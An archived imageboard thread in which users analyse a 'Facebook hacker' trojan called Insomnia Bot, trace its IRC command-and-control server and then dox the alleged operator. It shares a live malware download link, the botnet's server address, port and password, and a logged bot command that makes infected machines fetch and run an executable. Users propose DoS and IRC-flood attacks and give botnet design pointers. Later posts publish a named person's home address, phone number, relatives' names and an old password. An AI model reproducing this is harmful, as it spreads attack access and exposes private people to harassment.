Quantcast
[ 3 / biz / cgl / ck / diy / fa / g / ic / jp / lit / sci / tg / vr ] [ index / top / reports / report a bug ] [ 4plebs / archived.moe / rbt ]

2017/01/28: An issue regarding the front page of /jp/ has been fixed. Also, thanks to all who contacted us about sponsorship.

/g/ - Technology


View post   

[ Toggle deleted replies ]
File: 19 KB, 300x200, 300px-Halcali_20070706_Japan_Expo_6.jpg [View same] [iqdb] [saucenao] [google] [report]
24442662 No.24442662 [Reply] [Original] [archived.moe] [rbt]

hey /g/ decided to throw that "FB hack" malware that was spaming up 4chan into IDA. What's all this mumbo jumbo? Obfuscation of payload with crypto?

.method public static hidebysig object u5rzyYVg3GqDiRiv(string QASLEpdnXynq1Z00, object[] OBCaOVYiENQWUxNviJ)
{
.maxstack 6
.locals init (class [mscorlib]System.Reflection.Assembly V0,
valuetype [mscorlib]System.Reflection.BindingFlags V1)
call unsigned int8[] kYZkK6ewPGQm3BLv::get_rn()
call class [mscorlib]System.Reflection.Assembly tlfRCIdWBWevjsG1::assm(unsigned int8[] by)
stloc.0
ldc.i4.0

>> No.24442681

Yep, looks like the symbol names are probably obfuscated to make reverse engineering harder.

What you really want to look for is a connect-back domain, or much more simply, run the thing in a VM, open up Wireshark, and see where the connections go.

>> No.24442693

I'd suggest using reflector as it looks like it was coded in .NET. IDA won't be as useful.

>> No.24442715

>>24442681
Way ahead of you actually. I think the author threw his nick into it BTW... he has some very v& shit on 2share.

Is /g/ interested in working together for great justice?

>> No.24442727

>>24442693
I looked into that but...
1) I know zero programming
2) On a netbook for the time being
3) Seemed like the real meat and potatoes is in assembly.

>> No.24442740

>>24442715
I'd love to help. However keep in mind there are probably a whole bunch of different people spreading the shit. Any old retard can spread a semi-legit-looking undetectable RAT.

Would you mind posting the nick and other things you've found in it? I don't know very much about reversing myself, unfortunately.

Tbh reversing this thing is most likely a waste of time though. The logic is going to be the same as any other reverse-connect RAT. You basically just wanna run `strings` on the thing and monitor all incoming and outgoing traffic.

>> No.24442790

>>24442740
kk... so the tcp flow was like this:

almost immediately his api.wipmania.com for IP geolocation

I saw a sleep 1000 in there somewhere... which seemed to correspond with the wait for it connecting to we.be.thu.gs and then promptly thereafter it went to terror-squad.co

sorry for putting info out slowly. really don't want to post his nick since it lead to a few thousand ftp l/ps in the first few results on google.

>> No.24442954

screw it... i'm too curious.
http://pastebin.com/9TVjrL1k

thoughts?

the md5 on this was the same as what was posted on /g/ etc. both exe loaded themselves into the reg like once every 5 seconds. i hate to talk shit without knowing programming but this all seemed VERY sloppy to me.

>> No.24442999

>>24442954
can you follow the TCP stream and save/upload it somewhere.

>> No.24443028

>>24442999
nice get.

was 10min too short on pastebin?

>> No.24443035

>>24442790
google "we.be.thu.gs"

http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html

appears it's a rather large and recent botnet command & control server, with at least an irc daemon running. the bot in question seems to be a .NET RAT called "Insomnia Bot".

no idea if it's sloppy or not, really.

if you read the blog comments, it looks those additional exe's being downloaded are the very latest version of the bot, while the "facebook hacker" is a slightly older version. so it's probably an auto-update procedure.

Rocko/BV1 appears to be the nick of the primary controller. what nick did you see in your analysis?

>> No.24443038

>>24442790
>we.be.thu.gs

ISHYGDDT

>> No.24443068

>>24443035
reverse for endian (no fucking clue if that's the right phrase)

then ahem... KILLA... something or other. Maybe cam'ron not sure. (^_^)

>> No.24443094

>>24443038
Well obv I already did. Pretty sure I got a DDoS a few hours later (maybe they thought it was weird that I had CaptureBAT running?). Really wish I wasn't behind a SOHO... would've been nice to check that zerg rush out.

>> No.24443113

BTW can someone do an nmap -A? never got around to it but really wanted to know what was up with those domains.

>> No.24443166

OP, can you upload the executable you're working with to a file sharing site? i want to examine it myself.

>>24443068
i assume you mean little endian, which means the bytes are in reverse order.

>>24443094
wait you mean the botnet owner realized you were investigating it and he started DDoSing you?


anyway, upon furthe research:

BV1 appears to be the developer of the RAT, and he is also providing hosting for botnets with his server we.be.thu.gs. the individual people spreading the RAT pay for access to the software and the hosting. so there's probably a decent handful of people who are using this server.

it's kinda funny that there's a whole underground "black" hosting market, isn't it?

>>24443113
nmap on the irc server (we.be.thu.gs) shows only 3 open ports. ssh (running a non-exploitable version), an irc daemon on port 443, and a web interface on port 80. web interface requires standard HTTP authentication.

i'm curious what irc daemon it's running...

OP, can you leave me a gmail or MSN or something I can contact you with?

>> No.24443190

>>24443113
Oh, also:

nmap says it's running Linux kernel 2.6.x. Not that that's useful.

I'm a bit curious about the nature of the domain. I can't find much info on "thu.gs" and going to it simply shows an empty FTP directory. I'm wondering if it's hacked, or if it's used to give out domains, or if the bot maker actually owns it himself. Have a lot of research to do.

>> No.24443260

OP, I found some very interesting shit. Very interesting indeed.

Leave me something to contact you with.

>> No.24443266

>>24443166
http://www.2shared.com/file/n-9Fmk8I/file2exe.html

pass=get

lets feel this out a bit more in this thread. will reopen if 404

>> No.24443315

>>24443260
NO. FUCKING. SHIT!!!

Honestly... this whole thing is way bigger than my skill set. I'm just some anon studying for the CCNA that took offense to some anon saying "lol /g/ can't RE" last night.

If you can run with it then awesome... I couldn't go any further but knew it was too good to let die.

btw the cryptex guy seems to have the same humor as the spam that was on here... hmmm... couldn't be that he's related or that faussz and muvz... ;-)

>> No.24443317

>>24443266
"get" isn't working. using regular `gpg`

>> No.24443336

>>24443317
get like... EPIC GET. not like "get"

cheers!

>> No.24443371

>>24443315
I'm probably not much better than you reverse engineering wise. But if you're looking to find info on the botnet and its bot spreaders, it seems quite easy.

The owner of thu.gs and various terror-squad sites is a guy named Brendan J. He's got a huge trail of emails and accounts all over the internet. He may very well be the bot writer, too. I could probably find a lot more.

Is it worth looking into this further? Maybe send the info to moot, even?

>> No.24443396

>>24443371
Definitely... almost wish I was a tripfag. BTW looks like muvz has a twitter following one other @... He might fly a lot.

I'm just happy I could share.
>feelsgoodman.jpg

>> No.24443402

how much processing power do you need to actually host these botnet nodes?

>> No.24443424

>>24443402
Hella niggabytes

>> No.24443432

>>24443396
I'm wondering how many people are involved in all this. It definitely needs to be attacked at the root though.

Imo, post threads like this on /g/ every so often. Let's try and get /g/ to fuck with these people and this botnet. Will certainly be more interesting than the usual discussions, and it's actually a good cause. Plus they're the people spamming 4chan in the first place.

I'll update with more info today or tomorrow. Got an exam unfortunately.

>>24443402
Probably not a whole ton. You'd need a fair amount of upstream bandwidth though.

>> No.24443437

>>24443336
ok perhaps i am retarded but GET does not work either. are you saying it's a riddle of some sort or what?

>> No.24443460

im thinking of sending a couple pieces of cheap hardware to relatives and hosting shit in different country

upstream i can get, 100mbit line shud be sufficient to start right?

>> No.24443480

Running dox so far on the bot maker and owner of the botnet C & C server.

Name: Brendan J
Usernames: BMJ, bmjslider, BV1
Email: [email protected]

MSN: [email protected]

AIM: Neu Army1

Appears to live in California. Not 100% sure though.

>>24443460
Why do you want a botnet?

>> No.24443505

"24443166"

Yeah... we'll keep it going. I think there's room for lulz and moral faggotry in the same move.

It's time for /g/ to be something more than battle stations... expecially since I did all this research on an netbook with 1gb of RAM (^_^)

>> No.24443511

>>24443480
>Why do you want a botnet?
Not him, but so I can blast Metallica's 'Master of Puppets' whilst chuckling maniacally as I make my bots do my bidding.
Oh, and the monologue. Every villian needs to have a good monologue when confronted by do-gooders.

>> No.24443618

Server we.be.thu.gs ssl required to connect. use xchat or install it on mirc accept his invalid certificate
Port 443
Password fuckyou
To conect do this /server we.be.thu.gs:+443
channels :
#US
#CA
#RU
#BR
#b8896 306039

Local users: Current Local Users: 1732 Max: 2638
Global users: Current Global Users: 1741 Max: 2647

>> No.24443648

>centralized botnet
>2012
Seriously.

>> No.24443658
File: 40 KB, 522x399, 1282786204310.jpg [View same] [iqdb] [saucenao] [google] [report]
24443658

>>24443618
<3 u anon

>> No.24443692

>>24443618
Might want to use a proxy to connect. Just in case he does something back to you.

>> No.24443695

>>24443648
just to experiment, also good to have an off shore server

now to have a decentralized botnet

HOW DOES THAT WORK

because im looking into decentralized networks, and I wanna do a decentralized LAN, kinda like an local-city undernet, free from officials....like if nodes are taken down, it can stills tay up

>> No.24443696

>>24443480
BV1 is short for Blade_V1per

He uses the usernames:

BladeV1per
Blade_V1per
Blade

Will post more tomorrow. If there's no thread about this I'll make one.

Even if we can't hack their control server or something, we can still fuck with them.

>> No.24443703

cant u throw commands at this nodes?

>> No.24443734

I'll admit I only understand half of whats going on here and that I haven't been on /g/ for that long.

This is one of the most interesting threads I've seen. Actually want to see where this goes.

>> No.24443740

4am est on a weekday

ofcourse /g/ is interesting now

>> No.24443744

>>24443696
So pumped.

I declare this to be Project HALCALI. We shall mark related threads with their visage.

I need a few shots of gin and some sleep. Accolades anon.

>> No.24443772

>>24443734
It's gonna get more interesting soon, I promise.

I'll be back tomorrow with more information. I've done many things like this in the past, though I've never taken on a botnet before.

The next thread should probably have an OP that drives interest, like:

"Help us dox and fuck with the owners of the botnet that's responsible for all the 4chan "facebook hacker.exe" malware spam." And then some sort of call-to-arms image. I dunno.

>>24443744
Sure. Though I have no idea what HALCALI is.

Tasks others can do:

-Google the shit out of the usernames listed
-Get a decent .NET reverser and see what IRC commands are used by this bot
-The bot is named "Insomnia" so google around for Insomnia Bot information. There very well may be some exploits in it.

Relevant domains:

thu.gs
we.be.thu.gs
Anything with "terror-squad" in the name
many more

http://www.opensc.ws/cracked-malware/17627-insomnia-bot-v2-0-0-builder.html

http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html

Btw, posting this shit publicly is maybe a bad idea since Mr. "Blade V1per" may read it and take precautions. But whatever.

>> No.24443861

You could emulate a client and try to DOS the server with resource intensive communication.
Let's say the client can send something that ends up as a database query on the server. Use that to DOS.

>> No.24443885

>>24443695
All decentralized networks require some sort of bootstrapping like an initial node list.
Look into: TOR and the Kademlia DHT.
You can setup a private TOR network.

>> No.24443891

>>24443861
This might be a really good idea actually.

>> No.24443925

>>24443885
i'll look into it

really though, thanks a lot

>> No.24443974

>>24443925
TOR is the easiest way to start a decentralized botnet.
You get end-to-end encryption out of the box and it can be integrated very easily. The only downside is its size.

>> No.24444076

>>24443772
i2p would be much better for aforementioned intents and purposes.

>> No.24444854

> utorrent = botnet
> chrome = botnet

finally /g/ gets to go to war with a real botnet. this is going to be epic.

>> No.24444958

Bumping. I don't know too much, but I know enough to know that this is intredasting.

>> No.24445024
File: 360 KB, 450x191, hacker.gif [View same] [iqdb] [saucenao] [google] [report]
24445024

MESS WITH THE BEST, DIE LIKE THE REST

>> No.24445177

Bumping

>> No.24445285

Don't know if you guys are still here, but looks like the same malware
>>>/s/13143075

>> No.24445634

>>24445285
Indeed it does.

>> No.24445737
File: 72 KB, 450x331, 1334848857856.jpg [View same] [iqdb] [saucenao] [google] [report]
24445737

>>24443618
>[12:44] * You were kicked from #b8896 by b (This is not #kiddiechat)

>> No.24446950
File: 914 KB, 2560x1600, Anna_rollip.jpg [View same] [iqdb] [saucenao] [google] [report]
24446950

>>24445285
Ofc it's spammed on boards with adult content. People there tend to turn their brains off when the lower instincts take over.

>> No.24449329

>>24446950
Any interest in this still?

http://www.booterdown.com/ - One of the sites he helps run.

Old "introduction" by him. He confirms he lives in California: http://s1.zetaboards.com/leader_bible/topic/801305/1/#post30695

His name is almost definitely Brendan J. Still trying to figure out what the J stands for.

He also appears to manage payments for the Blackshade RAT, which is a very popular RAT.

A server or possibly personal computer he's used in the past:

lancerimpact.dyndns.info
Resolves to 174.91.127.194
Server is located in Toronto

It's running something interesting on port 443. Connecting to the port and sending any kind of data results in it spitting back some bytes and exiting. Anyone wanna try and identify what it is? I'll look into it more later.

On port 8080 there's a WRT54G login dialog. So this is probably someone's home computer, which he hacked.

An old password he's used:
byas40pz

Is it worth it remaking this thread with a more dramatic OP, to encourage others to help with this noble cause?

>> No.24449411

>>24449329
Still monitoring the thread, don't have much reverse engineering skill, but I'm willing to help with research or other random stuff. Currently studying for a midterm, but will help out over the weekend if this is still alive.

Really want to see this go somewhere

>> No.24449550

Botnet currently has 2671 bots and growing. I'd guess nearly all are from 4chan.

>>24449411
Tbh this isn't a matter of reverse engineering at the moment, more a matter of investigation. RE'ing would only tell a bit more about how the bot works, but all bots work the same to be honest. The hard part would be seeing if there are any potential vulnerabilities. A .NET reversing expert would be needed for that.

>> No.24449592

>>24449550
This may sound ignorant, but how do Botnet works?

>> No.24449621

>>24449592
The bot installs on your computer and connects to a command and control server. This on is a irc server, but others are http or a custom protocol. You issue instructions to the bots via the C&C and they execute them. Most common uses are ddos, spam, etc.

>> No.24449676

>>24449621
The owner is trying to mine some bitocoins.

(12:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(1:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe

https://www.virustotal.com/file/32215c7edd326319a3f9480ef7cd5ecec661bddf2ae59911fa05a0148217bad7/ana
lysis/
Too bad that the download link for his miner was blocked or we could see which pool he uses.

>> No.24449689

>>24449550
What are some investigation techniques other than searching for stuff and using nmap to scrape basic info on hosts?

>> No.24449776

Here is some stuff I compiled on this last night for exposedbotnets.com
http://pastebin.com/zD9Q5q90
>>24449689
You can run the bot in a virtual machine and see what is connects to and what commands are recieved. In this case it connects using ssl, so you can't sniff the commands. Redirect the domain using the hosts file to a local irc server running on the same port and see what channels it joins. Join those on the botnet irc. The topics are encrypted, but you can just make those the topics of the local irc channels and see what happens, ie if it joins channels or prints out passwords.

>> No.24449907

If people are looking for simple stuff to help out,
Send abuse reports to [email protected] for 80.82.79.21, which is the ip address.
You can also report bv1.co for fake whois information.

>> No.24449932

>>24449776
what if you make a trusted root CA on the computer, then MiTM with a server running IRC over SSL with a cert from that CA? It's possible unless he's checking to make sure the cert comes from a particular authority or something,

>> No.24449965

>>24449932
You could. He is self signing the certs so it would be easy. I'm just not going to go that far.

>> No.24450003

Spokeo indicates [email protected] is Brendan Johnston.

He has online profiles tied to that account. It thinks he's 21 (most likely accurate; they source their data from marketing shit; e.g. when you give your email to a store or to enter a contest).

>> No.24450073

>>24450003
Very good work. Looks legit. Try running [email protected] as well; another email of his.

Do you actually pay for a Spokeo account, btw?

I have exams all day today but tonight I'll post all the domains of his I've found so far.

>> No.24450107

>>24450003
Youtube profile confirms the age.

>>24450073
You do for the extended information. The name and age were free.

Also, TERROR-SQUAD.CO has invalid WHOIS info. Just to rustle his jimmies I'm complaining to ICANN (he is required to maintain accurate WHOIS info).

>> No.24450138

Does anyone use Pipl and is it reliable?

>> No.24450160

>>24450107
Don't forget to complain about bv1.co as well.

>> No.24450185
File: 12 KB, 392x326, newcing.png [View same] [iqdb] [saucenao] [google] [report]
24450185

>>24450160
Will do.

The phone number on the TERROR-SQUAD.CO is, shockingly, accurate.

His dad's name is Chris and he's somewhere around (~30 miles most likely) Camarillo, CA

>> No.24450206
File: 42 KB, 936x364, internic.png [View same] [iqdb] [saucenao] [google] [report]
24450206

>>24450185
complaint one is out

>> No.24450254

>>24450206
and complaint 2
I may be able to find his city through spokeo now that I know his dad's name

>> No.24450319

Pooling the data, and going over each piece of information would help this cause. It would be wise for everyone to question everything.

The biggest challenge in id'ing someone like this is confirming what you can. Since we're on 4chan, minimizing the collateral damage should sort of be priority seeing how broad se are.

>> No.24450354

Big scams and botnets are usually run by organised crime. I'd be careful of your own trail while snooping about.

>> No.24450429

He runs lancerimpact.dyndns.info (source: pastebin of password dump of dyndns users).

That points to a server in Canada run on the ISP bell.

>> No.24450474

If he did this shit under a different name or used generic names or something like that, not linking his booter sites to his botnets or whatever (I don't understand all this shit) he could probably avoid what you're all doing.

Silly people.

>> No.24450523

>>24450003
>[email protected]
He lives in Cali...

>http://imageshack.us/homepage/?user=bmjslider
His imageshack.

>http://beta.xfire.com/profile/bmjslider/
Xfire.


And [email protected] has so much fucking accounts.

http://pipl.com/search/?q=bladeviper%40live.ca&l=&sloc=&in=6

>> No.24450586

>>24450523
Also, I don't know who Bladeviper is... But he discusses LoL on Reddit.

>> No.24450730

Is there any activity between bot and C&C?
If so, it should be rather easy to sniff it via MITM and keep it active, which is important since cmd timestamps etc., which help fingerprinting.

>> No.24450743

He's got his client set up to tell all his bots to download his bitcoin miner every 30 minutes. Does he not know about how to set up a link in the topic for onjoin?

>> No.24450759

>>24450730
The connection is encrypted with ssl. Not much activity going on in the channels.

>> No.24450889

>>24450586
It's used by multiple people as a name. It's not all him.

It looks like the stumbleupon is real. profile says 21 and california. probably the congregate too

>> No.24450945
File: 13 KB, 640x126, class-act.jpg [View same] [iqdb] [saucenao] [google] [report]
24450945

>he buys virtual items
>then he disputes them as unauthorized
This kid is a douche
http://www.sythe.org/showthread.php?p=8787215#post8787215

>> No.24451059

>>24450945
>http://www.sythe.org/showthread.php?p=8787215#post8787215
Only one guy who wanted to buy gold hasn't been banned. Lots of scammers I guess.

>> No.24451099

I tried to get his name through Paypal, but that's out. He's been banned.

>> No.24451140

>>24451099
PSN ID is LegendBV1
Runescape name BV1
Old Runescape name Paariah
XBL Gamertag: Pears LOL

>> No.24451181

>>24451140
he accepts payment for his products using runescape gold, so you could probably report him for real money trading.

>> No.24451193

>>24451181
Mageblackx15/Casey is a friend of his
Source: LegendBV1 youtube (age matches)

>> No.24451267

what is this I don't even...
http://www.wix.com/bmjslider/test123

>> No.24451329

Game over folks
He registered real address info on one domain
http://whois.domaintools.com/bv1.biz

Stupid kid

>> No.24451377

>>24451329

is he going to get in legal trouble or are people just gonna order pizza to his house?

>> No.24451402

>>24451377
If he's running a botnet and people sent this information to the FBI or some shit as a tip? He could end up in potential legal trouble. Running a botnet in the US is pretty fucking stupid.

>> No.24451431

http://maps.google.com/maps?q=1615+el+dorado+drive,+thousand+oaks,+ca&ll=34.195866,-
118.848789&spn=0.007286,0.016512&sll=34.196298,-118.848764&layer=c&cbp=13&#4
4;4.19,,0,7.05&cbll=34.195908,-118.848878&gl=us&hnear=1615+El+Dorado+Dr&
#44;+Thousand+Oaks,+California+91362&t=m&z=17&panoid=w1bwUwLnkKWE-XoH1PxTPg
His house
note the 1615 on the mailbox
(pic is shit due to the moving truck)

>> No.24451443

>>24451431
nice botnet link

almost clicked and joined by accident

>> No.24451480

>>24451329
Beds: 3
Baths: 2
Sqft: 1,655
Lot: 24,684 sq ft / 0.57 acres
Type: Single Family
Year built: 1962
Last sold: Apr 1992 for $314,000
Parking: Garage - Attached
Cooling: Central
Heating: Forced air
Fireplace: Yes
This 1655 square foot single family home has 3 bedrooms and 2.0 bathrooms. It is located at 1615 El Dorado Dr Thousand Oaks, California. This home is in the Conejo Valley Unified School District. The nearest schools are Meadows Elementary School, Los Cerritos Middle School and Century High.

>> No.24451489

>>24451431
HS graduation
http://www.toacorn.com/news/2008-06-19/schools/041.html

http://ww2.conejo.k12.ca.us/westlake/arrow/2008Archive/May30,2008/pdfs/A12-13May.pdf
goes/went to to moorpark college

guess community college leaves him enough time to host a botnet on the side

>> No.24451495

>>24451443
google maps?

>> No.24451533

Holy shit. The power of collaboration. I don't know the whole story, but it is stupid to run a botnet in America.

>> No.24451547

>>24451533
We're just making stuff up you dumbass

>> No.24451559

>>24451547
You can google the info easily, it all ties together.

>> No.24451590

>>24451547

Who the fuck would spend the better part of 12 hours making shit up? Oh wait, I forgot where I was for a moment.

In seriousness, these things tend to pay off in a big way every time /g/ comes across something like this.

>> No.24451612

>centralized botnet
if it's not decentralized and uses public key authentication for commands then it's shit

I like this thread :3

>> No.24451621

>>24451547
'Sup, Brendan?

>> No.24451632

http://www.robtex.com/dns/bv1.biz.html
>Host names sharing IP with A records (1 item)
>thu.gs
AND WE'VE CLEANLY TIED BRENDAN JOHNSTON IN THOUSAND OAKS CA TO THU.GS

TADA

>> No.24451676

ITT: expert googlers

>> No.24451686

>>24451676
I don't think any of us are pretending to be anything more than that.

>> No.24451690

Hva somone considered contacting the FBI or whoever deals with botnets in Murrica?

>> No.24451703

>>24451632
>Domains sharing name servers (24 items)
>They're all fucking spam/scam sites
Jeebus.

>> No.24451722

>>24451690
/b/ is probably faster then sending a formal fbi compaint

>> No.24451749

Hey, the WHOIS data on the tHu.gs domain is fake, should I complain?

>> No.24451768

>>24451749
Yes.

>> No.24451770
File: 218 KB, 720x480, Big NO.png [View same] [iqdb] [saucenao] [google] [report]
24451770

never change /g/

>> No.24451774

>>24451749
yes please do

and have /b/ "help" a bit too
that is probably where the botmaster lurks

>> No.24451775

>>24451722
Just rename it to meeting_minutes.docx.exe and send in to a bunch of .gov and .mil email addresses. That will get some attention.

>> No.24451792

>>24451775
not as fun as watching /b/ shit all over the poor fellow...

>> No.24451794

>>24451775
>yfw america turns into botnet

>> No.24451797

http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html
has updated with most of the latest info. I'll just send him the bv1.biz domain with the legit info.

>> No.24451804

>>24451768
>>24451774
Never mind, gs is south georgia. They aren't going to give a single shit about the complaint.

>> No.24451824

>>24451686
reported for false advertising

>> No.24451831
File: 115 KB, 1809x607, oFwcU.png [View same] [iqdb] [saucenao] [google] [report]
24451831

This nigga is cray

>> No.24451879

>>24451831

>> No.24451883

>>24451831
I wouldn't fuck with him.
He has spent more time on skid forums than I have in any vidya game.

>> No.24451903

>>24451883
None of us will fuck with him directly, I would think.

Retaliation is more likely to be legal if anything. The kid is running a botnet!

>> No.24451930
File: 50 KB, 799x384, glToQ.png [View same] [iqdb] [saucenao] [google] [report]
24451930

BV1 general

>> No.24451960

>>24451903
>HACK THE PLANET.
Botnets are fucking stupid.
I hope he gets buttfucked in jail.
>Inb4 my trip gets hacked by BV1

>> No.24451965

>>24451930
>mfw honeypot

>> No.24451973

Oh boy, I can't wait for this guy to become a meme and only with this ends up as a joke on /g/ with nothing happening to him.

>> No.24451975

>>24451903
Super easy to get at him legally. Report the we.be.thu.gs server to ecatel.net for botnets, [email protected]
and report thu.gs and bv1.co to icann for fake whois
http://wdprs.internic.net/

>> No.24451989

>>24451973
You know, someone COULD actually link to the archive, etc. with this information and let the FBI know.

One person complained about Thad McMichael's Facebook profile to the FB1.

>> No.24452000

>>24451989
>FB1
FBI*

>>24451975
ecatel is unlikely to care if they know they're running a bot server
.gs domains are out of ICANN jurisdiction

>> No.24452012

Paying for malware installs with credit card.
https://secure.payproglobal.com/orderpage.aspx?products=92417&customField1=
Anyone want to report them to the payment processor?

>> No.24452048

>>24452000
Are .co domains? It's registered to godaddy, so they should have the correct whois.
If they get enough abuse reports they should fold. They're hosted in the Netherlands, not Russia or somewhere. Who do they get their upstream from?

>> No.24452053

>>24452012
easy enough
email [email protected]
http://whois.domaintools.com/payproglobal.com

email the thread link that describes blackshades as a bot

>> No.24452063

>>24452048
.co domains are; that's already been complained about.

>> No.24452077

Brendan M Johnston
(805) 496-4021
1615 El Dorado Dr
Thousand Oaks, CA 91362-2116
Age: 18-24
Associated: Renee J Johnston, Edward C Johnston, Chris C Johnston, Chrisopher Johnston

http://www.whitepages.com/16176/track/10215/search/Replay?x1=Johnston+Brendan+M&addr=1615+El+Dor
ado+Dr+Thousand+Oaks+CA+91362+US&x2=%28805%29+496-4021&org=&sec=Johnston+Renee+J&sec
=Johnston+Edward+C&sec=Johnston+Chris+C&sec=Johnston+Chrisopher+&piplstart=&search_i
d=21251310720367859067&lower=1&more_info=1

>> No.24452081

>>24452048
>>24452063 here
also there's enough information to link this guy to his real name.

giving it to law enforcement is better than getting his bot server shut down and he opens up a new one in 48 hours.

>> No.24452091

>>24452081 here
and before you say, why not both, law enforcement needs to be able to collect proof that it is a botnet server, etc. that will stand in court. this info could spur an investigation.

>> No.24452114
File: 327 KB, 560x414, Randal.png [View same] [iqdb] [saucenao] [google] [report]
24452114

ITT

>> No.24452166

>>24452048
Edenhost wont' give a shit
http://www.robtex.com/dns/thu.gs.html#shared

look at Domains sharing name servers (24 items)
(ns3.edenhost.com and ns4.edenhost.com)
they are all scam/spam sites

>> No.24452198

http://www.ic3.gov/complaint/default.aspx

>> No.24452201

>>24452114
Yeah, I don't get why put so much energy into this, normally only underage posters like to involve themselves with doxing and other assorted "whiteknight" shit, I personally do not favour any side, the guy was kind of a jerk by coming here and spamming his shit, though.

>> No.24452211

http://imageshack.us/photo/my-images/707/img0617hz.jpg/

>taking picture of bong
>hackforums on the screen
>.NET malware

Johnson confirmed for utter faggot

>> No.24452222

Thanks for this thread OP. /g/ has been pretty shit for about 4 months now. Threads like these keep me coming here

>> No.24452236

>>24452211

http://imageshack.us/photo/my-images/710/sjklrbhdsg001.jpg/

>XPS

Oh god wow it gets even funnier

>> No.24452243
File: 68 KB, 463x564, 1331871506565.jpg [View same] [iqdb] [saucenao] [google] [report]
24452243

>>24452211
No fucking kidding, this guy is cancer. Although if you are dumb enough to install his shit you deserve it

>> No.24452254

>>24452166
The nameservers are hosted by OVH though. If someone put together a big email documenting all the sites on them, and showing no action on the part of edenhost, they might take them down.

>> No.24452258

>>24452236
B-B-B-LINDED BY THE RICE
LIT UP LIKE A DOUCHE
XTREME GAYMEN IN THE NIGHT

>> No.24452284

>>24452254
Yeah, somebody just has to actually do the complaint.

>> No.24452293

>>24452236
His fabulous runescape wealth
http://imageshack.us/photo/my-images/4/bv120120212bv0027.png/

>> No.24452317

Hahahaha holy shit. I'm the guy who originally found some of his domains and info yesterday. I come back and see all this.

You've done me proud /g/. Very good work. Good use of Robtex as well.

If you report him to one of the local FBI cybercrime offices in California, they'll probably look into it.

Anyone wanna join his IRC server and fuck with him a bit?

>> No.24452325

So, if this guy is not living with their parents, you could say he makes a decent living off malware and illegal activities? He has 2 cars and a nice home with a pool, buys prebuilt shit, etc.

>> No.24452332

>>24452293
His runescape posse
http://imageshack.us/f/10/bv120120307bv0163.jpg/

>> No.24452342

Holy shit this is going into movie territory

http://www.threatexpert.com/report.aspx?md5=16867ad479a1f18c4f1dfcf8145dd24c
>Analysis of the file resources indicate the following possible country of origin:
>Finland

HE'S NOT ALONE IN THIS

Somebody is commenting in finnish and using finnish resources while compiling it (e.g. a finnish windows install)

This is most likely international crime among a group!

>> No.24452344

>>24452325
>not living with his parents
>screencaps of runescape wealth

>> No.24452352

>>24452325
>making a living off malware

lol'ed

>> No.24452367

>>24452342
yes they call themselves blackshades

bshades.eu

>> No.24452370

>>24452342
more like one of his BFFs he met on runescape

>> No.24452381
File: 469 KB, 214x185, 1326556511115.gif [View same] [iqdb] [saucenao] [google] [report]
24452381

what is IDA? what is this thread about? doxing a cyber villain?

only thing i see is an unusually collaborative /g/

thanks

>> No.24452390

>>24452325
Look at this wealth
http://imageshack.us/f/713/bv120120307bv0161.png/

>> No.24452397

>>24452342
Well the terror squad site had a log of an upload from a Ukrainian IP, not that that proves anything

>> No.24452404

>>24452381
-faggot spamming 4chan and elsewhere by selling botnet
-/g/ tracks down his info through online resources and connected usernames
-eventually we get his real address through WHOIS
-and then we find indications that he's not in this alone

>> No.24452423

>>24443692
>Just in case he does something back to you.

Doubt it. He used VB ffs.

>> No.24452424

>>24452404
-and then we find indications that he's a massive nigger faggot

FTFY

>> No.24452428

>>24452352
He sells the malware, probably does encryption for a fee, sells VPN services, etc. He probably sells the Credit cards harvested by his botnet, could rent zombies, etc. Not to mention he could be using the credit cards to buy physical items, etc.

If he has a forum and a whole website, you could make $3,000-4,000 USD monthly without even working.

>> No.24452435

>>24452317
>Anyone wanna join his IRC server and fuck with him a bit?
Do you have the address?

>> No.24452441

http://sekurity.tumblr.com/post/9256524052/project-booter-down
here is himself and another faggot working on removing booters run by competitors under the guise of improving things
>This project is ran by ‘Orgy’ and ‘BV1’

>> No.24452446

>>24452404
that's neat

i haven't noticed any spam on the boards lately though...

>> No.24452450

>>24452317
the irc doesn't block tor.... yet

initiate multithreaded irc floodbots?

>> No.24452452

>>24452342
If you do some research, it appears this guy is not the actual program.

BV1/BladeV1per/Brendan Johnston is just the admin and the sales guy. He sells the bots, he provides hosting for the botnets, but he doesn't code them, presumably because he's unskilled and unintelligent. As can be seen from his forum posts.

Finding the original author of the malware would be tough.

>>24452381
tl;dr thread summary:

See all those threads spamming /b/, /g/, and just about everywhere else advertising a "facebook hacker"? The spammer samefags the threads saying "omg it really works thanks OP" but obviously it's a trojan that puts your computer in a botnet. The seller of the trojan, and the head admin of the botnet, is this guy Brendan Johnston. He runs the server all the 4chan bots are currently connecting to. The bot is known as Insomnia Bot.

He also sells the Blackshades RAT, which is very popular.

Odds are he's friends with or has some deal or contract with the original programmer of Insomnia.

>>24452428
He's not actually a programmer at all, he's more of a ringleader. He probably makes deals with various programmers and splits profits with them. He doesn't write the bots and I doubt he writes the crypters, and he probably doesn't even know how to.

>> No.24452453

>>24452446
>dat sage
Looks like HE is amoung us!

>> No.24452464

>>24452453
the thread is active and i'm not really contribooting, no need

>> No.24452470

>>24452453
Sages can be polite.

>> No.24452472

>>24452452
-FBI busts johnston
-follow da money
-???
-profit
domains and servers appear to be bought by johnston
others in on it will have to connect to these servers

plus johnston may flip over for a deal

>> No.24452479

>>24452453
You know, on other chans, a sage-like reply means "My post isn't important enough to bump"

>> No.24452480

>>24452435
> reading the thread is hard

>> No.24452481

>>24452450
Yes.

Do it. Fucking do it.

Flood the IRC server to hell.

>>24452446
It's mostly on /b/ I think. But I've seen at least 4 threads on /g/ with the spam.

>> No.24452486

>>24451489
http://bigkesh.com/

and his programming company!

>> No.24452494

So where is the exe and can I decompile it if it hasn't already?

>> No.24452502

I found his facebook profile.

>> No.24452514

Hmm, so BV1 is the person makes a living from .NET malware? Haha this just makes me laugh so hard man thats funny.

>>24452325
If you have no ethics and basic C++ knowledge (fuck, even vb.net will be okay, this guy is using .net) then yeah you can make a fair amount of money depending on the size of your botnet. People monentize them in different ways:

-PPI affiliate networks
-buttcoins
-SEO "services" (facebook likes, craigslist spam etc)
-sell the malware (this idiot does)

>>24452342
